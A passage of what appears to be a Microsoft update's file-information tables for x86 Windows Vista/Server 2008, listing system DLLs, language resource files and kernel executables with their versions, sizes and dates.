6.0.6002.24089| 356,352| 07-Apr-2017| 16:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 348,160| 07-Apr-2017| 16:44| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 802,816| 07-Apr-2017| 15:22| x86| Not applicable \nOle32.dll| 6.0.6002.19773| 1,321,472| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,318,912| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Jan-2007| 19:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 
32,768| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:50| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 20:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 27-Nov-2006| 21:37| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 13-Dec-2006| 22:22| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 16-Jan-2007| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:19| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 07-Nov-2006| 03:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable 
\nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 18-Jan-2007| 03:20| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 09-Nov-2006| 03:58| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Nov-2006| 07:09| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not 
applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 15:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 15:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 
07-Apr-2017| 16:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:35| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:40| Not applicable| Not applicable 
\nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:35| Not applicable| Not applicable \n \n## \n\n__\n\nFor all supported x86-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform**| **Service branch** \n---|---|---|---|---|---|--- \nAdvapi32.dll.mui| 6.0.6002.19598| 380,928| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:12| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:17| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 401,408| 06-Feb-2016| 04:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 266,240| 06-Feb-2016| 02:20| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:09| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 04:03| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 02:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 376,832| 06-Feb-2016| 04:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:00| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 03:28| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 360,448| 06-Feb-2016| 04:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 02:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 03:06| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 03:04| Not applicable| Not 
applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:14| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 389,120| 06-Feb-2016| 04:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 393,216| 06-Feb-2016| 04:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:53| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 385,024| 06-Feb-2016| 03:11| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 356,352| 06-Feb-2016| 03:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.19598| 348,160| 06-Feb-2016| 04:33| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 380,928| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:49| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:39| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 401,408| 07-Apr-2017| 16:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 266,240| 07-Apr-2017| 15:34| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:46| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:48| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 376,832| 07-Apr-2017| 16:29| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:42| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:43| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 360,448| 07-Apr-2017| 16:37| Not 
applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:36| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:45| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:47| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:59| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 389,120| 07-Apr-2017| 16:58| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 393,216| 07-Apr-2017| 16:57| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:51| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 385,024| 07-Apr-2017| 16:37| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 356,352| 07-Apr-2017| 16:52| Not applicable| Not applicable \nAdvapi32.dll.mui| 6.0.6002.24089| 348,160| 07-Apr-2017| 16:44| Not applicable| Not applicable \nAdvapi32.dll| 6.0.6002.19598| 802,304| 06-Feb-2016| 02:11| x86| Not applicable \nAdvapi32.dll| 6.0.6002.24089| 802,816| 07-Apr-2017| 15:22| x86| Not applicable \nOle32.dll| 6.0.6002.19773| 1,321,472| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll| 6.0.6002.24089| 1,318,912| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.19773| 551,424| 14-Apr-2017| 20:31| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nRpcss.dll| 6.0.6002.24089| 554,496| 07-Apr-2017| 15:24| x86| X86_MICROSOFT-WINDOWS-COM-BASE-QFE \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Jan-2007| 19:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not 
applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:30| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:50| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 20:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:34| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 27-Nov-2006| 21:37| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:43| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 13-Dec-2006| 22:22| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 16-Jan-2007| 03:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:21| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 09:48| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 24,576| 14-Apr-2017| 21:19| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 07-Nov-2006| 
03:40| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:29| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 02-Nov-2006| 10:52| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Dec-2006| 03:28| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 18-Jan-2007| 03:20| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 32,768| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 09-Nov-2006| 03:58| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:31| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 21-Nov-2006| 03:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:28| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Jan-2007| 03:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 28,672| 14-Apr-2017| 21:26| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 05-Nov-2006| 23:23| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6000.16386| 3,584| 08-Nov-2006| 07:09| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.19773| 20,480| 14-Apr-2017| 21:27| Not applicable| Not applicable \nOle32.dll.mui| 
6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:22| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 15:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 15:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:18| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:20| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:26| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:31| Not applicable| Not 
applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:32| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 24,576| 07-Apr-2017| 16:35| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:24| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:27| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:19| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:23| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:37| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:46| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:39| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 32,768| 07-Apr-2017| 16:44| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:36| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:42| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:25| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 16:33| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:21| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 28,672| 07-Apr-2017| 
16:24| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:34| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:40| Not applicable| Not applicable \nOle32.dll.mui| 6.0.6002.24089| 3,584| 07-Apr-2017| 16:31| Not applicable| Not applicable \nOleres.dll.mui| 6.0.6002.24089| 20,480| 07-Apr-2017| 16:35| Not applicable| Not applicable \nComcat.dll| 6.0.6000.16386| 7,168| 02-Nov-2006| 09:46| x86| Not applicable \nOleres.dll| 6.0.6002.19773| 23,552| 14-Apr-2017| 19:01| x86| Not applicable \nComcat.dll| 6.0.6002.24089| 7,168| 07-Apr-2017| 15:23| x86| Not applicable \nOleres.dll| 6.0.6002.24089| 23,552| 07-Apr-2017| 14:31| x86| Not applicable \nCsrsrv.dll| 6.0.6002.19680| 49,664| 12-Aug-2016| 18:55| x86| Not applicable \nCsrsrv.dll| 6.0.6002.24089| 49,664| 07-Apr-2017| 15:23| x86| Not applicable \nKernel32.dll| 6.0.6002.19623| 894,976| 18-Mar-2016| 17:09| x86| Not applicable \nKernel32.dll| 6.0.6002.24089| 895,488| 07-Apr-2017| 15:23| x86| Not applicable \nNtdll.dll| 6.0.6002.19623| 1,208,568| 21-Mar-2016| 22:57| x86| Not applicable \nNtdll.dll| 6.0.6002.24089| 1,209,592| 11-Apr-2017| 04:10| x86| Not applicable \nOleaut32.dll| 6.0.6002.19773| 574,464| 14-Apr-2017| 20:31| x86| Not applicable \nOleaut32.dll| 6.0.6002.24089| 574,464| 07-Apr-2017| 15:24| x86| Not applicable \nNtkrnlpa.exe| 6.0.6002.19764| 3,610,856| 06-Apr-2017| 16:06| Not applicable| Not applicable \nNtoskrnl.exe| 6.0.6002.19764| 3,558,120| 06-Apr-2017| 16:06| Not applicable| Not applicable \nNtkrnlpa.exe| 6.0.6002.24089| 3,613,416| 07-Apr-2017| 15:31| Not applicable| Not applicable \nNtoskrnl.exe| 6.0.6002.24089| 3,562,216| 07-Apr-2017| 15:31| Not applicable| Not applicable \nRpcrt4.dll| 6.0.6002.19598| 783,872| 06-Feb-2016| 02:12| x86| Not applicable \nRpcrt4.dll| 6.0.6002.24089| 783,872| 07-Apr-2017| 15:24| x86| Not applicable \nSmss.exe| 6.0.6002.19598| 64,000| 06-Feb-2016| 00:32| x86| Not applicable \nSmss.exe| 6.0.6002.24089| 
